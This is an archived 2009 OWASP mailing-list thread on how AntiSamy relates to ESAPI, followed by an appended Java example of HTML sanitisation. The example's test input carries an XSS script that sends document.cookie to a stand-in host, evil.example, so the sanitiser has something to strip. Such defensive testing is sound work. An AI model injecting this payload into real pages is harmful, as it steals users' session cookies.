[OWASP-ESAPI] antisamy and esapi

Chris Schmidt chrisisbeef at gmail.com
Tue Aug 4 17:57:40 EDT 2009


See my replies below:

On Tue, 2009-08-04 at 14:43 -0700, Joanne Sun wrote:
> Thanks for your fast reply. I read the link again but I am still not
> clear.
> For preventing XSS, all the rules 
> http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
> 
> use ESAPI as example
> 
> and the
> http://www.owasp.org/index.php/How_to_perform_HTML_entity_encoding_in_Java did not mention AntiSamy

AntiSamy is not really about preventing XSS or doing HTML entity
encoding. AntiSamy is a library that will allow you to validate user
entered input against a set of rules (pre-defined or custom to your
application) and make sure there is not any "malicious" code being
submitted to be persisted in your app. This is really geared towards
applications where you are allowing users to customize user profiles or
content that is displayed and persisted using HTML/CSS and even some JS.
It runs its validation rules against the user-submitted code and either
passes it as safe or fails it as unsafe.

ESAPI on the other hand is a toolkit designed to define a central API
where all calls to validate/verify/authenticate/log or perform other
security centric operations should go. 

This would include CSRF, User Authentication, etc.

> 
> So is AntiSamy better than ESAPI, or the opposite? It seems AntiSamy is
> good at preventing CSRF, judging from a slide at
> http://www.owasp.org/images/e/e9/OWASP-WASCAppSec2007SanJose_AntiSamy.ppt.
> 

It really depends on what you are trying to do. Personally, I would
recommend that you use ESAPI which will also provide AntiSamy's
functionality to you.

> If we got the license for AntiSamy, is that not enough to use ESAPI?
> But is the other direction OK?
> 

Not sure what you mean here. These are both open source solutions and, as
such, there is no licensing in the sense that you have to purchase a
license to use the product. The licensing for both applications just
requires you to agree to the terms of use for the product and agree to
the license itself.

Hopefully this answers your questions. Let us know if there is anything
else we can help you with. 



> Thanks,
> 
> On Tue, Aug 4, 2009 at 2:19 PM, Chris Schmidt <chrisisbeef at gmail.com>
> wrote:
>         Also,
>         
>         ESAPI uses AntiSamy to validate HTML in the reference
>         implementation
>         
>         org.owasp.esapi.reference.validation.HTMLValidationRule
>         
>         
>         On Tue, 2009-08-04 at 10:51 -1000, Jim Manico wrote:
>         > Does this help at all?
>         >
>         >
>         http://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project#What_is_it.3F
>         >
>         >         ----- Original Message -----
>         >         From: Joanne Sun
>         >         To: OWASP-ESAPI at lists.owasp.org
>         >         Sent: Monday, August 03, 2009 8:39 PM
>         >         Subject: [OWASP-ESAPI] antisamy and esapi
>         >
>         >
>         >         Hello,
>         >
>         >         Could you please tell me what is the relation
>         between Antisamy
>         >         and ESAPI? Which I should use for my java ee
>         project?
>         >
>         >         Thank you!
>         >
>         >         Joanne
>         >
>         >
>         >
>         >         _______________________________________________
>         >         OWASP-ESAPI mailing list
>         >         OWASP-ESAPI at lists.owasp.org
>         >         https://lists.owasp.org/mailman/listinfo/owasp-esapi
>         
>         
> 
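The two routes Chris describes, AntiSamy applied directly against a policy file and the same check reached through ESAPI's reference Validator (which delegates to AntiSamy via org.owasp.esapi.reference.validation.HTMLValidationRule), as an added Java example that is not code from the thread or from either project. It assumes the AntiSamy sample policy antisamy-slashdot.xml is on the classpath, that ESAPI.properties is present and names its own AntiSamy policy (antisamy-esapi.xml is the usual default), and that the submitted "bio" string is a constructed sample; the validation context name "UserProfile.bio" and the 2000-character limit are illustrative choices:

```java
import java.io.InputStream;
import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;
import org.owasp.esapi.ESAPI;
import org.owasp.esapi.errors.ValidationException;

public class UserHtmlValidation {

    // Constructed sample: a profile "bio" as an attacker might submit it.
    // Bold and the link are the kind of markup a policy may allow; the
    // onclick handler and the <script> block are what it must strip.
    static final String SUBMITTED_BIO =
        "<b>Hi</b>, I like <a href=\"http://example.org\" onclick=\"steal()\">links</a>"
        + "<script>document.location='http://evil.example/?c='+document.cookie</script>";

    /** Route 1: AntiSamy directly. Loads a policy and scans the fragment;
     *  CleanResults carries both the sanitised HTML and the list of
     *  policy violations that were removed. */
    static CleanResults scanWithAntiSamy(String html, String policyResource)
            throws PolicyException, ScanException {
        // Assumed: the policy XML (e.g. AntiSamy's sample antisamy-slashdot.xml)
        // is available as a classpath resource.
        InputStream in = UserHtmlValidation.class.getResourceAsStream("/" + policyResource);
        if (in == null) {
            throw new PolicyException("policy not found on classpath: " + policyResource);
        }
        Policy policy = Policy.getInstance(in);
        return new AntiSamy().scan(html, policy);
    }

    /** Route 2: through ESAPI. The reference Validator's getValidSafeHTML
     *  runs HTMLValidationRule, which hands the fragment to AntiSamy using
     *  the policy configured in ESAPI.properties (assumed: antisamy-esapi.xml).
     *  Depending on release and configuration it either returns the cleaned
     *  fragment or throws ValidationException when the policy is violated. */
    static String validateWithEsapi(String html) throws ValidationException {
        // "UserProfile.bio" is an illustrative context label; 2000 is an
        // illustrative maximum length; allowNull=false rejects null input.
        return ESAPI.validator().getValidSafeHTML("UserProfile.bio", html, 2000, false);
    }

    public static void main(String[] args) throws Exception {
        CleanResults results = scanWithAntiSamy(SUBMITTED_BIO, "antisamy-slashdot.xml");
        System.out.println("AntiSamy clean HTML : " + results.getCleanHTML());
        System.out.println("Policy violations   : " + results.getNumberOfErrors());
        for (Object msg : results.getErrorMessages()) {
            System.out.println("  - " + msg);
        }

        try {
            String viaEsapi = validateWithEsapi(SUBMITTED_BIO);
            System.out.println("ESAPI clean HTML    : " + viaEsapi);
        } catch (ValidationException e) {
            // ESAPI centralises the failure: log it and reject the submission.
            System.out.println("ESAPI rejected input: " + e.getMessage());
        }
    }
}
```

The point of the second route is the one Chris makes in the thread: the application calls a single ESAPI entry point for input validation, and whether HTML is checked by AntiSamy (and against which policy) becomes a configuration decision rather than something each form handler decides for itself. Persist and later render only the cleaned output, never the original submission.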


